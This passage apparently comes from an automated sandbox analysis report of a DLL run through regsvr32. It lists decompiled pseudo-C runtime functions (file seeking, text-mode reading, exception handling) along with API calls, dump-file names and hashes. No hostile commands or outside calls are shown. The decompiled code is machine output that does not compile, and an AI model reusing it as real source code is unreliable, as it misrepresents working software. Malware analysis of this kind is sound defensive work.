                                                                      				goto 0x80057428;
                                                                      				if (_t35 == 0xffffffff) goto 0x8005742c;
                                                                      				 *( *((intOrPtr*)(0x80073d10 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) =  *( *((intOrPtr*)(0x80073d10 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) & 0x000000fd;
                                                                      				return _t35;
                                                                      			}










                                                                      0x1800573ec
                                                                      0x1800573ec
                                                                      0x1800573ef
                                                                      0x1800573f3
                                                                      0x1800573f7
                                                                      0x1800573fb
                                                                      0x180057413
                                                                      0x18005741f
                                                                      0x180057421
                                                                      0x180057428
                                                                      0x18005742f
                                                                      0x18005743e
                                                                      0x18005743e
                                                                      0x18005744a
                                                                      0x180057457
                                                                      0x18005745c
                                                                      0x180057468
                                                                      0x18005746d
                                                                      0x18005747b
                                                                      0x180057488
                                                                      0x18005748f
                                                                      0x180057492
                                                                      0x180057498
                                                                      0x18005749e
                                                                      0x1800574a5
                                                                      0x1800574aa
                                                                      0x1800574c8
                                                                      0x1800574e7

                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018005725C,?,?,?,?,?,?,?,0000000180056E71), ref: 0000000180057442
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,000000018005725C,?,?,?,?,?,?,?,0000000180056E71), ref: 000000018005744C
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018005725C,?,?,?,?,?,?,?,0000000180056E71), ref: 0000000180057473
                                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018005725C,?,?,?,?,?,?,?,0000000180056E71), ref: 0000000180057498
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FilePointer$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 142388799-0
                                                                      • Opcode ID: ab8e39541e1d6857c1ec7985f74548340818e126da3627c6bf027cec57ac6044
                                                                      • Instruction ID: 227cc0e7616bef7ce6c8f6afb441708fa40f908761e8214cd8688f0fd3dbfdbd
                                                                      • Opcode Fuzzy Hash: ab8e39541e1d6857c1ec7985f74548340818e126da3627c6bf027cec57ac6044
                                                                      • Instruction Fuzzy Hash: E521D771304B5881E7A18B25B8403A97BA5F388FE4F548311FE6D47BD6CF39C2599B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FilePointer$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 142388799-0
                                                                      • Opcode ID: 8220f27df752527593cfa8cab194a47574ccc54fc677732f9699bb5b206e2033
                                                                      • Instruction ID: f7ae7b0ec09a73706b9a1b2a2e0a5fba4186846d7ec5834aad4f100cbdf485b5
                                                                      • Opcode Fuzzy Hash: 8220f27df752527593cfa8cab194a47574ccc54fc677732f9699bb5b206e2033
                                                                      • Instruction Fuzzy Hash: 6D118271314B48C6E7618F26B80079AB7A5F78CFD8F548221FE5893B95DF39C6488B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClientScreen$CloseGestureHandleInfoInvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1511994336-0
                                                                      • Opcode ID: 77d0fa13980072b8af3e3222eb8a109d590990d63e2d57a232213fadc6bd8439
                                                                      • Instruction ID: 764452d4b6986a4e45c174d9d866cdf496da7abd9becde9f75437845330f2238
                                                                      • Opcode Fuzzy Hash: 77d0fa13980072b8af3e3222eb8a109d590990d63e2d57a232213fadc6bd8439
                                                                      • Instruction Fuzzy Hash: 4221ED76619A84CBD790CF29E45036FB7A0F7C8B95F108116EA9987728DF3CC585CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E00000001180057D90(void* __eax, void* __ebx, signed int __ecx, void* __esi, long long __rbx, char* __rdx, void* __r8, signed long long __r9, char _a8, intOrPtr _a16, long long _a24, intOrPtr _a40) {
                                                                      				intOrPtr _v64;
                                                                      				signed int _v72;
                                                                      				void* __rdi;
                                                                      				signed char _t119;
                                                                      				signed int _t125;
                                                                      				intOrPtr _t131;
                                                                      				void* _t133;
                                                                      				void* _t138;
                                                                      				void* _t139;
                                                                      				void* _t140;
                                                                      				char _t143;
                                                                      				char _t150;
                                                                      				signed int _t151;
                                                                      				signed int _t152;
                                                                      				signed int _t172;
                                                                      				intOrPtr _t186;
                                                                      				char* _t187;
                                                                      				intOrPtr* _t191;
                                                                      				char* _t196;
                                                                      				void* _t199;
                                                                      				signed char* _t200;
                                                                      				signed char* _t202;
                                                                      				char* _t207;
                                                                      				intOrPtr _t210;
                                                                      				intOrPtr _t211;
                                                                      				signed long long _t217;
                                                                      				signed long long _t222;
                                                                      				signed long long _t225;
                                                                      				signed long long _t230;
                                                                      				void* _t233;
                                                                      				signed long long _t240;
                                                                      				void* _t241;
                                                                      
                                                                      				_t138 = __ebx;
                                                                      				_a24 = __rbx;
                                                                      				_t225 = __ecx >> 6;
                                                                      				_t240 = __r9;
                                                                      				_t222 = __ecx + __ecx * 8;
                                                                      				_t186 =  *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8));
                                                                      				if (__r8 == 0) goto 0x80057de6;
                                                                      				if ( *__rdx != 0xa) goto 0x80057de6;
                                                                      				 *(_t186 + 0x38 + _t222 * 8) =  *(_t186 + 0x38 + _t222 * 8) | 0x00000004;
                                                                      				goto 0x80057deb;
                                                                      				 *(_t186 + 0x38 + _t222 * 8) =  *(_t186 + 0x38 + _t222 * 8) & 0x000000fb;
                                                                      				_t233 = __rdx + __r8;
                                                                      				_t187 = __rdx;
                                                                      				r13d = 1;
                                                                      				if (__rdx - _t233 >= 0) goto 0x80057f0e;
                                                                      				_t150 =  *((intOrPtr*)(__rdx));
                                                                      				if (_t150 == 0x1a) goto 0x80057ef0;
                                                                      				_t24 = _t187 + 1; // 0x1
                                                                      				_t207 = _t24;
                                                                      				if (_t150 == 0xd) goto 0x80057e1f;
                                                                      				 *__rdx = _t150;
                                                                      				goto 0x80057e3c;
                                                                      				if (_t207 - _t233 >= 0) goto 0x80057e49;
                                                                      				if ( *_t207 != 0xa) goto 0x80057e33;
                                                                      				 *__rdx = 0xa;
                                                                      				goto 0x80057e39;
                                                                      				 *__rdx = 0xd;
                                                                      				_t196 = __rdx + 1;
                                                                      				if (_t207 + _t241 - _t233 < 0) goto 0x80057e04;
                                                                      				goto 0x80057f0e;
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = r13d;
                                                                      				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x80057ee4;
                                                                      				if (_a16 == 0) goto 0x80057ee4;
                                                                      				_t217 = __ecx >> 6;
                                                                      				r14d = r14d & 0x0000003f;
                                                                      				_t230 = __ecx + __ecx * 8;
                                                                      				if (( *( *((intOrPtr*)(0x180000000 + 0x73d10 + _t217 * 8)) + 0x38 + _t230 * 8) & 0x00000048) == 0) goto 0x80057eb6;
                                                                      				_t143 = _a8;
                                                                      				if (_t143 != 0xa) goto 0x80057ea4;
                                                                      				 *_t196 = 0xa;
                                                                      				goto 0x80057f0b;
                                                                      				 *_t196 = 0xd;
                                                                      				_t191 =  *((intOrPtr*)(0x180000000 + 0x73d10 + _t217 * 8));
                                                                      				 *((char*)(_t191 + 0x3a + _t230 * 8)) = _t143;
                                                                      				goto 0x80057f0b;
                                                                      				if (_a8 != 0xa) goto 0x80057ec2;
                                                                      				if (_t196 == __rdx) goto 0x80057e9f;
                                                                      				r8d = r13d;
                                                                      				E00000001180056FF4(_t191, _t196, _t222);
                                                                      				if (_a8 == 0xa) goto 0x80057f0e;
                                                                      				 *_t196 = 0xd;
                                                                      				goto 0x80057f0b;
                                                                      				 *_t196 = 0xd;
                                                                      				goto 0x80057f0b;
                                                                      				_t210 =  *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8));
                                                                      				_t119 =  *(_t210 + 0x38 + _t222 * 8);
                                                                      				_t172 = _t119 & 0x00000040;
                                                                      				if (_t172 != 0) goto 0x80057f08;
                                                                      				 *(_t210 + 0x38 + _t222 * 8) = _t119 | 0x00000002;
                                                                      				goto 0x80057f0e;
                                                                      				 *_t196 = 0x1a;
                                                                      				_t139 = _t138 - __esi;
                                                                      				if (_t172 != 0) goto 0x80057f19;
                                                                      				goto 0x8005804b;
                                                                      				_t211 =  *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8));
                                                                      				if ( *((char*)(_t211 + 0x39 + _t222 * 8)) != 0) goto 0x80057f2f;
                                                                      				goto 0x8005804b;
                                                                      				_t69 = _t139 + __rdx - 1; // -1
                                                                      				if ( *_t69 < 0) goto 0x80057f46;
                                                                      				_t199 = _t139 + __rdx;
                                                                      				goto 0x80057fec;
                                                                      				_t151 = r13d;
                                                                      				goto 0x80057f5b;
                                                                      				if (_t151 - 4 > 0) goto 0x80057f69;
                                                                      				if (_t199 - __rdx < 0) goto 0x80057f69;
                                                                      				_t200 = _t199 - _t241;
                                                                      				_t152 = _t151 + r13d;
                                                                      				if ( *((char*)(_t191 + 0x1800729c0)) == 0) goto 0x80057f4b;
                                                                      				r8d =  *_t200 & 0x000000ff;
                                                                      				if ( *((char*)(_t230 + 0x1800729c0)) != 0) goto 0x80057f8d;
                                                                      				_t125 = E0000000118003BFFC( *((char*)(_t230 + 0x1800729c0)), _t191);
                                                                      				 *_t191 = 0x2a;
                                                                      				goto 0x8005804b;
                                                                      				if ((_t125 | 0xffffffff) + 1 != _t152) goto 0x80057f9a;
                                                                      				goto 0x80057fec;
                                                                      				if (( *(_t211 + 0x38 + _t222 * 8) & 0x00000048) == 0) goto 0x80057fdc;
                                                                      				_t202 =  &(( &(_t200[_t191]))[_t241]);
                                                                      				 *((intOrPtr*)(_t211 + 0x3a + _t222 * 8)) = r8b;
                                                                      				if (_t152 - 2 < 0) goto 0x80057fbf;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)) + 0x3b + _t222 * 8)) =  *_t202;
                                                                      				if (_t152 != 3) goto 0x80057fd5;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)) + 0x3c + _t222 * 8)) = _t202[_t241];
                                                                      				goto 0x80057fec;
                                                                      				r8d = r13d;
                                                                      				E00000001180056FF4( *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)),  &(( &(_t202[_t241]))[_t241]) -  *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)), _t222);
                                                                      				_t131 = _a40;
                                                                      				_t140 = _t139 - __esi;
                                                                      				_v64 = _t131;
                                                                      				r9d = _t140;
                                                                      				_v72 = _t240;
                                                                      				E00000001180044A00();
                                                                      				if (_t131 != 0) goto 0x80058028;
                                                                      				_t133 = E0000000118003C12C(GetLastError(), _t131,  *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)), _t211);
                                                                      				goto 0x80057f85;
                                                                      				 *(0x180000000 + 0x3d + _t222 * 8) =  *(0x180000000 + 0x3d + _t222 * 8) & 0x000000fd;
                                                                      				asm("sbb al, al");
                                                                      				 *(0x180000000 + 0x3d + _t222 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x73d10 + _t225 * 8)) + 0x3d + _t222 * 8) |  ~(_t133 - _t140) & 0x00000002;
                                                                      				return  ~_t152 +  ~_t152;
                                                                      			}



































                                                                      0x180057d90
                                                                      0x180057d90
                                                                      0x180057db7
                                                                      0x180057dbb
                                                                      0x180057dc4
                                                                      0x180057dc8
                                                                      0x180057dd8
                                                                      0x180057ddd
                                                                      0x180057ddf
                                                                      0x180057de4
                                                                      0x180057de6
                                                                      0x180057deb
                                                                      0x180057def
                                                                      0x180057df5
                                                                      0x180057dfe
                                                                      0x180057e04
                                                                      0x180057e09
                                                                      0x180057e0f
                                                                      0x180057e0f
                                                                      0x180057e16
                                                                      0x180057e1b
                                                                      0x180057e1d
                                                                      0x180057e22
                                                                      0x180057e27
                                                                      0x180057e29
                                                                      0x180057e31
                                                                      0x180057e33
                                                                      0x180057e3c
                                                                      0x180057e42
                                                                      0x180057e44
                                                                      0x180057e49
                                                                      0x180057e54
                                                                      0x180057e67
                                                                      0x180057e6e
                                                                      0x180057e7a
                                                                      0x180057e7e
                                                                      0x180057e8a
                                                                      0x180057e94
                                                                      0x180057e96
                                                                      0x180057e9d
                                                                      0x180057e9f
                                                                      0x180057ea2
                                                                      0x180057ea4
                                                                      0x180057ea7
                                                                      0x180057eaf
                                                                      0x180057eb4
                                                                      0x180057ebb
                                                                      0x180057ec0
                                                                      0x180057ec2
                                                                      0x180057ecc
                                                                      0x180057edd
                                                                      0x180057edf
                                                                      0x180057ee2
                                                                      0x180057ee4
                                                                      0x180057eee
                                                                      0x180057ef0
                                                                      0x180057ef8
                                                                      0x180057efc
                                                                      0x180057efe
                                                                      0x180057f02
                                                                      0x180057f06
                                                                      0x180057f08
                                                                      0x180057f0e
                                                                      0x180057f10
                                                                      0x180057f14
                                                                      0x180057f19
                                                                      0x180057f26
                                                                      0x180057f2a
                                                                      0x180057f35
                                                                      0x180057f3c
                                                                      0x180057f3e
                                                                      0x180057f41
                                                                      0x180057f46
                                                                      0x180057f49
                                                                      0x180057f4e
                                                                      0x180057f53
                                                                      0x180057f55
                                                                      0x180057f58
                                                                      0x180057f67
                                                                      0x180057f69
                                                                      0x180057f78
                                                                      0x180057f7a
                                                                      0x180057f7f
                                                                      0x180057f88
                                                                      0x180057f91
                                                                      0x180057f98
                                                                      0x180057f9f
                                                                      0x180057fa1
                                                                      0x180057fa4
                                                                      0x180057fac
                                                                      0x180057fbb
                                                                      0x180057fc2
                                                                      0x180057fd1
                                                                      0x180057fda
                                                                      0x180057fde
                                                                      0x180057fe7
                                                                      0x180057fec
                                                                      0x180057ff3
                                                                      0x180057ff5
                                                                      0x180057ff9
                                                                      0x180057fff
                                                                      0x18005800b
                                                                      0x180058014
                                                                      0x18005801e
                                                                      0x180058023
                                                                      0x180058039
                                                                      0x180058040
                                                                      0x180058044
                                                                      0x180058062

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLastRead
                                                                      • String ID: MZx
                                                                      • API String ID: 1948546556-2575928145
                                                                      • Opcode ID: 73e8ea874aaa79b77f6bad9fe480a2179c082056dfa9171f5d46188ec4c934aa
                                                                      • Instruction ID: c7540beeb5b7762a790d097310ea92b1e062748ec4757863686cc28d72dc78e1
                                                                      • Opcode Fuzzy Hash: 73e8ea874aaa79b77f6bad9fe480a2179c082056dfa9171f5d46188ec4c934aa
                                                                      • Instruction Fuzzy Hash: 5491097271468C45F7A3DA24A8443E96B81A359BD4F28C621FA5E572D2CF3ECA4DE301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E00000001180052918(void* __ecx, void* __esp, void* __eflags, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
                                                                      				char _v80;
                                                                      				signed long long _v96;
                                                                      				long long _v104;
                                                                      				long long _v136;
                                                                      				signed long long _v144;
                                                                      				signed int _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				signed long long _v176;
                                                                      				signed int _v184;
                                                                      				void* __rbx;
                                                                      				void* _t105;
                                                                      				void* _t126;
                                                                      				long long _t127;
                                                                      				signed long long _t131;
                                                                      				signed int _t132;
                                                                      				long long _t134;
                                                                      				signed long long _t136;
                                                                      				long long _t155;
                                                                      				intOrPtr* _t156;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				signed long long _t163;
                                                                      
                                                                      				_t126 = _t157;
                                                                      				r12d = 0;
                                                                      				_v184 = r12d;
                                                                      				_a24 = _a24 & r12d;
                                                                      				_v176 = _v176 & _t163;
                                                                      				_v152 = _v152 & _t163;
                                                                      				 *((intOrPtr*)(_t126 - 0x80)) = r12b;
                                                                      				 *(_t126 - 0x7c) =  *(_t126 - 0x7c) & r12d;
                                                                      				 *(_t126 - 0x78) =  *(_t126 - 0x78) & r12d;
                                                                      				 *(_t126 - 0x74) =  *(_t126 - 0x74) & r12d;
                                                                      				 *(_t126 - 0x70) =  *(_t126 - 0x70) & r12d;
                                                                      				 *(_t126 - 0x6c) =  *(_t126 - 0x6c) & r12d;
                                                                      				E0000000118002DD20(_t126);
                                                                      				_t127 =  *((intOrPtr*)(_t126 + 0x28));
                                                                      				_v160 = _t127;
                                                                      				E0000000118002DD20(_t127);
                                                                      				_v168 =  *((intOrPtr*)(_t127 + 0x20));
                                                                      				_t155 =  *((intOrPtr*)(__rcx + 0x50));
                                                                      				_a32 = _t155;
                                                                      				_t134 =  *((intOrPtr*)(__rcx + 0x40));
                                                                      				_v136 =  *((intOrPtr*)(__rcx + 0x30));
                                                                      				_v104 =  *((intOrPtr*)(__rcx + 0x48));
                                                                      				_t131 =  *((intOrPtr*)(__rcx + 0x68));
                                                                      				_v96 = _t131;
                                                                      				_a16 =  *((intOrPtr*)(__rcx + 0x78));
                                                                      				_a8 =  *((intOrPtr*)(__rcx + 0x38));
                                                                      				E0000000118002DB64( *((intOrPtr*)(__rcx + 0x38)), _t134);
                                                                      				E0000000118002DD20(_t131);
                                                                      				 *((long long*)(_t131 + 0x20)) = _t155;
                                                                      				E0000000118002DD20(_t131);
                                                                      				 *((long long*)(_t131 + 0x28)) = _t134;
                                                                      				E0000000118002DD20(_t131);
                                                                      				E000000011800422E0(_t131,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x20)) + 0x28)));
                                                                      				_v144 = _t131;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x58)) == _t163) goto 0x80052a1a;
                                                                      				_a24 = 1;
                                                                      				E0000000118002DD20(_t131);
                                                                      				_v152 =  *((intOrPtr*)(_t131 + 0x70));
                                                                      				r8d = 0x100;
                                                                      				E0000000118005AA70(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t160);
                                                                      				_v176 = _t131;
                                                                      				if (_t131 - 2 >= 0) goto 0x80052a4e;
                                                                      				_t136 =  *((intOrPtr*)(_t157 - 0xa8 + 0x70 + _t131 * 8));
                                                                      				if (_t136 == 0) goto 0x80052b61;
                                                                      				_v176 = _t136;
                                                                      				E0000000118005AAA0(_t136,  *((intOrPtr*)(__rcx + 0x28)));
                                                                      				_v184 = 1;
                                                                      				E0000000118002DD20(_t131);
                                                                      				 *(_t131 + 0x40) =  *(_t131 + 0x40) & 0x00000000;
                                                                      				E0000000118002DD20(_t131);
                                                                      				 *((intOrPtr*)(_t131 + 0x78)) = _a16;
                                                                      				_t156 = _a32;
                                                                      				if (_a24 == 0) goto 0x80052ab5;
                                                                      				E00000001180004510(1, __esp, _t156);
                                                                      				_t132 = _v152;
                                                                      				r8d =  *((intOrPtr*)(_t132 + 0x18));
                                                                      				goto 0x80052ac2;
                                                                      				r8d =  *((intOrPtr*)(_t156 + 0x18));
                                                                      				RaiseException(??, ??, ??, ??);
                                                                      				r12d = _v184;
                                                                      				E0000000118004231C(_t132, _v176, _v144);
                                                                      				if (r12d != 0) goto 0x80052b20;
                                                                      				if ( *_t156 != 0xe06d7363) goto 0x80052b20;
                                                                      				if ( *((intOrPtr*)(_t156 + 0x18)) != 4) goto 0x80052b20;
                                                                      				if ( *((intOrPtr*)(_t156 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80052b20;
                                                                      				if (E00000001180004638(_t132,  *((intOrPtr*)(_t156 + 0x28))) == 0) goto 0x80052b20;
                                                                      				E00000001180004510(1, __esp, _t156);
                                                                      				E0000000118002DD20(_t132);
                                                                      				 *((long long*)(_t132 + 0x20)) = _v168;
                                                                      				E0000000118002DD20(_t132);
                                                                      				 *((long long*)(_t132 + 0x28)) = _v160;
                                                                      				E0000000118002DD20(_t132);
                                                                      				 *((intOrPtr*)(_t132 + 0x78)) = _a8;
                                                                      				_t105 = E0000000118002DD20(_t132);
                                                                      				 *((intOrPtr*)(_t132 + 0x78)) = 0xfffffffe;
                                                                      				return _t105;
                                                                      			}


























                                                                      0x180052918
                                                                      0x18005292e
                                                                      0x180052931
                                                                      0x180052936
                                                                      0x18005293e
                                                                      0x180052943
                                                                      0x180052948
                                                                      0x18005294c
                                                                      0x180052950
                                                                      0x180052954
                                                                      0x180052958
                                                                      0x18005295c
                                                                      0x180052960
                                                                      0x180052965
                                                                      0x180052969
                                                                      0x18005296e
                                                                      0x180052977
                                                                      0x18005297c
                                                                      0x180052980
                                                                      0x180052988
                                                                      0x180052990
                                                                      0x18005299d
                                                                      0x1800529a2
                                                                      0x1800529a6
                                                                      0x1800529ae
                                                                      0x1800529b8
                                                                      0x1800529c2
                                                                      0x1800529c7
                                                                      0x1800529cc
                                                                      0x1800529d0
                                                                      0x1800529d5
                                                                      0x1800529d9
                                                                      0x1800529ee
                                                                      0x1800529f6
                                                                      0x1800529ff
                                                                      0x180052a01
                                                                      0x180052a0c
                                                                      0x180052a15
                                                                      0x180052a1a
                                                                      0x180052a28
                                                                      0x180052a30
                                                                      0x180052a39
                                                                      0x180052a3b
                                                                      0x180052a43
                                                                      0x180052a49
                                                                      0x180052a54
                                                                      0x180052a65
                                                                      0x180052a6d
                                                                      0x180052a72
                                                                      0x180052a76
                                                                      0x180052a82
                                                                      0x180052a85
                                                                      0x180052a95
                                                                      0x180052a9c
                                                                      0x180052aa1
                                                                      0x180052aaa
                                                                      0x180052ab3
                                                                      0x180052ab9
                                                                      0x180052ac2
                                                                      0x180052ac8
                                                                      0x180052ae4
                                                                      0x180052aec
                                                                      0x180052af4
                                                                      0x180052afa
                                                                      0x180052b07
                                                                      0x180052b14
                                                                      0x180052b1b
                                                                      0x180052b20
                                                                      0x180052b25
                                                                      0x180052b29
                                                                      0x180052b2e
                                                                      0x180052b32
                                                                      0x180052b3e
                                                                      0x180052b41
                                                                      0x180052b46
                                                                      0x180052b60

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2558813199-1018135373
                                                                      • Opcode ID: 3dd61b688ef4c1d08b494556f272b2fcfa0fb3719b9d12c494d99e670552b026
                                                                      • Instruction ID: 82741c7ec4d4948fe53a8d1265c6bee6fd587131efed3d580a61909f98765afc
                                                                      • Opcode Fuzzy Hash: 3dd61b688ef4c1d08b494556f272b2fcfa0fb3719b9d12c494d99e670552b026
                                                                      • Instruction Fuzzy Hash: 87515B76214B4886E6A2EF25E4403AE77A4F78DBD0F109115FF8907B56CF38C565CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E0000000118004ACD0(signed int __edx, void* __eflags, intOrPtr* __rcx, void* __rdx, void* __r10) {
                                                                      				char _v500;
                                                                      				intOrPtr _v504;
                                                                      				void* __rsi;
                                                                      				void* _t23;
                                                                      				void* _t24;
                                                                      				void* _t28;
                                                                      				void* _t33;
                                                                      
                                                                      				r10d = __edx;
                                                                      				r9d = 0x20;
                                                                      				r10d = r10d >> 5;
                                                                      				r14d = r9d;
                                                                      				r14d = r14d - (__edx & 0x0000001f);
                                                                      				r12d = 0;
                                                                      				r15d = 0;
                                                                      				asm("inc ecx");
                                                                      				r15d =  !r15d;
                                                                      				if (__eflags == 0) goto 0x8004ad23;
                                                                      				goto 0x8004ad26;
                                                                      				if (__rdx + __r10 - 0x73 <= 0) goto 0x8004ad5f;
                                                                      				 *__rcx = r12d;
                                                                      				_v504 = r12d;
                                                                      				r9d = 0;
                                                                      				E00000001180049864(0x1cc, _t23, _t24, __rcx + 4, __rdx, _t28,  &_v500, _t33);
                                                                      				return 0;
                                                                      			}










                                                                      0x18004ace8
                                                                      0x18004aceb
                                                                      0x18004acf1
                                                                      0x18004acf5
                                                                      0x18004ad00
                                                                      0x18004ad06
                                                                      0x18004ad11
                                                                      0x18004ad14
                                                                      0x18004ad1a
                                                                      0x18004ad1d
                                                                      0x18004ad21
                                                                      0x18004ad2d
                                                                      0x18004ad2f
                                                                      0x18004ad3b
                                                                      0x18004ad40
                                                                      0x18004ad48
                                                                      0x18004ad5e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
